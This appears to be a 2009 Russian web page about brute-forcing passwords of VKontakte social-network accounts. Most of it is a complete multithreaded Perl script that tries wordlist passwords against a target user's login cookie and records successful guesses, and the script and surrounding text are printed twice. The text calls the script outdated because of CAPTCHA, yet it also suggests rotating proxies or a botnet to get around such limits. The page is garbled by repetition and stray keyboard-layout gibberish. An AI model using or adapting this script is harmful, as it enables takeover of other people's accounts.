В интернете после создания сайта вконтакте.ру появилось куча аферюг предлагающих программы для подбора паролей (брутфорса) от сервиса вконтакте.ру
Павел Дуров , будучи не глупым человеком давным давно предусмотрел , что при увеличении нагрузок на сайт , и на систему авторизации ему придется как то защищаться от DDOS и DOS атак, и всяких брутфорсеров и давным давно ввёл CAPCHA , тоесть если вы скажем ошибетесь пару раз при вводе пароля, то сайт автоматически в каждый последующий раз попросит вас вводить некоторые циферки с картинки для подтверждения того что вы человек а не машина!
Вот пример одного из устаревших морально скритов брутфорса вконтакте, который был популярен на заре существования вконтакте.
Стоит ли говрить что все аналоги , переберающие пароли по какой либо базе бесполезны , только если они не используют proxy сервер для смены IP при каждом третьем запросе, или же это не БОТнет.
млщтефлеу
Павел Дуров , будучи не глупым человеком давным давно предусмотрел , что при увеличении нагрузок на сайт , и на систему авторизации ему придется как то защищаться от DDOS и DOS атак, и всяких брутфорсеров и давным давно ввёл CAPCHA , тоесть если вы скажем ошибетесь пару раз при вводе пароля, то сайт автоматически в каждый последующий раз попросит вас вводить некоторые циферки с картинки для подтверждения того что вы человек а не машина!
Вот пример одного из устаревших морально скритов брутфорса вконтакте, который был популярен на заре существования вконтакте.
Vkontakte.Ru Brute [FinaL]
Брутфорс акков вконтакте.ру
Сам скрипт брута (Perl):
#!/usr/bin/perl
use IO::Socket;
use MD5;
use threads;
use threads::shared;
my @pass : shared;
######################################
# C!klodoL
# vkontakte.ru bruteforce with multi-threads
######################################
$dic = 'passl.txt'; #словарь паролей
$id = 111111; #id цели
$mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40
$threads = 4; #количество потоков
######################################
open (pass, "<$dic");
Next:
@pass = pass();
for(0..$threads) {$trl[$_] = threads->create(&Brut, $_);}
for(@trl) { $_->join; }
sub Brut
{
while (@pass){
$pass = shift @pass;
$md5 = MD5->hexhash($pass);
$sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPor t=>80);
print $sock "HEAD http://vkontakte.ru/ HTTP/1.0\r\n".
"Host: vkontakte.ru\r\n".
"Accept: */*\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"User-Agent: Mozillo\r\n".
"Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n".
"Connection: close\r\n\r\n";
$answ = <$sock>;
close $sock;
print "$pass $answ";
if ($answ =~ /302/){
open (good, '>>good.txt');
print good "$id:$pass:$md5\n";
print "$id:$pass:$md5\n";
close good;
exit;}
}
}
goto Next;
sub pass
{
my (@mas);
while (<pass>){
push @mas, $_;
last if (@mas == 400);
}
chomp @mas;
return @mas;
}
Брутфорс акков вконтакте.ру
Сам скрипт брута (Perl):
#!/usr/bin/perl
use IO::Socket;
use MD5;
use threads;
use threads::shared;
my @pass : shared;
######################################
# C!klodoL
# vkontakte.ru bruteforce with multi-threads
######################################
$dic = 'passl.txt'; #словарь паролей
$id = 111111; #id цели
$mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40
$threads = 4; #количество потоков
######################################
open (pass, "<$dic");
Next:
@pass = pass();
for(0..$threads) {$trl[$_] = threads->create(&Brut, $_);}
for(@trl) { $_->join; }
sub Brut
{
while (@pass){
$pass = shift @pass;
$md5 = MD5->hexhash($pass);
$sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPor t=>80);
print $sock "HEAD http://vkontakte.ru/ HTTP/1.0\r\n".
"Host: vkontakte.ru\r\n".
"Accept: */*\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"User-Agent: Mozillo\r\n".
"Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n".
"Connection: close\r\n\r\n";
$answ = <$sock>;
close $sock;
print "$pass $answ";
if ($answ =~ /302/){
open (good, '>>good.txt');
print good "$id:$pass:$md5\n";
print "$id:$pass:$md5\n";
close good;
exit;}
}
}
goto Next;
sub pass
{
my (@mas);
while (<pass>){
push @mas, $_;
last if (@mas == 400);
}
chomp @mas;
return @mas;
}
Стоит ли говрить что все аналоги , переберающие пароли по какой либо базе бесполезны , только если они не используют proxy сервер для смены IP при каждом третьем запросе, или же это не БОТнет.
Версия для печати
drjynfrnt , d rjynfrnt
1-11-2009, 01:29
Просмотров: 91779
